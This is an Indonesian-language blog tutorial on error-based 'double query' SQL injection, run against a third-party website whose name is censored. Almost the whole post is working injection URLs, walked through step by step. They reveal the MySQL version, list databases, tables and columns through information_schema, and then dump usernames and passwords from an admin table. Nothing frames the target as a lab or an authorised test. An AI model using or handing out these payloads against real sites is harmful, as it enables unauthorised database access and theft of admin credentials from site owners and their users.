Subscribe:

Ads 468x60px

Selasa, 01 Juli 2014

Double Query Based Injection

Assalamualaikum
bertemu lagi dengan saya, kali ini tutorial mengenai double query injection :D

target sensor yah :D
http://janda.com/pro.php?id=8

kasih tanda petik dan perhatikan error nya

kemudian kita cari version nya dengan perintah
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+concat(0x7e,0x27,cast(version()+as+char),+0x27,0x7e))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1

version nya : 5.0.96-log

sekarang cari database nya
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(schema_name+as+char),0x27,0x7e)+FROM+information_schema.schemata+LIMIT+0,1))+from+information_schema.tables+limit+0,1),+floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1

hasilnya : information_schema
pada +LIMIT+0,1 kita ubah aja misal 1+1 2+1 dst

janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(schema_name+as+char),0x27,0x7e)+FROM+information_schema.schemata+LIMIT+1,1))+from+information_schema.tables+limit+0,1),+floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
database: challanich




sekarang mencari tabel dari database challanich

janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=0x6368616c6c616e696368+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1




beruntung langsung ada kata admin :D
table: ch_admin
sama seperti di atas limit 0+1 bisa di rubah seperti tadi

okay lanjut, sekarang melihat column dari table ch_admin

janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=0x6368616c6c616e696368+AND+table_name=0x63685f61646d696e+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1




perhatikan warna merah yah

nah limit nya kitah ubah lagi

janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=0x6368616c6c616e696368+AND+table_name=0x63685f61646d696e+LIMIT+1,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=


janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=0x6368616c6c616e696368+AND+table_name=0x63685f61646d696e+LIMIT+1,1))+from+information_schema.tables+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1




janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=0x6368616c6c616e696368+AND+table_name=0x63685f61646d696e+LIMIT+3,1))+from+information_schema.tables+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1



jadi kita simpulkan yang penting : user+password

sekarang dump
janda/pro.php?id=8+and+(select 1 from(select+count(*),concat((select+concat(user,0x3a,password,0x3a) from ch_admin+limit+0,1),floor(rand(0)*2))x from information_schema.tables+group by x)a) and 1=1
liat yang berwarna merah



 okay sekian dan terima kasih
semoga bermanfaat :D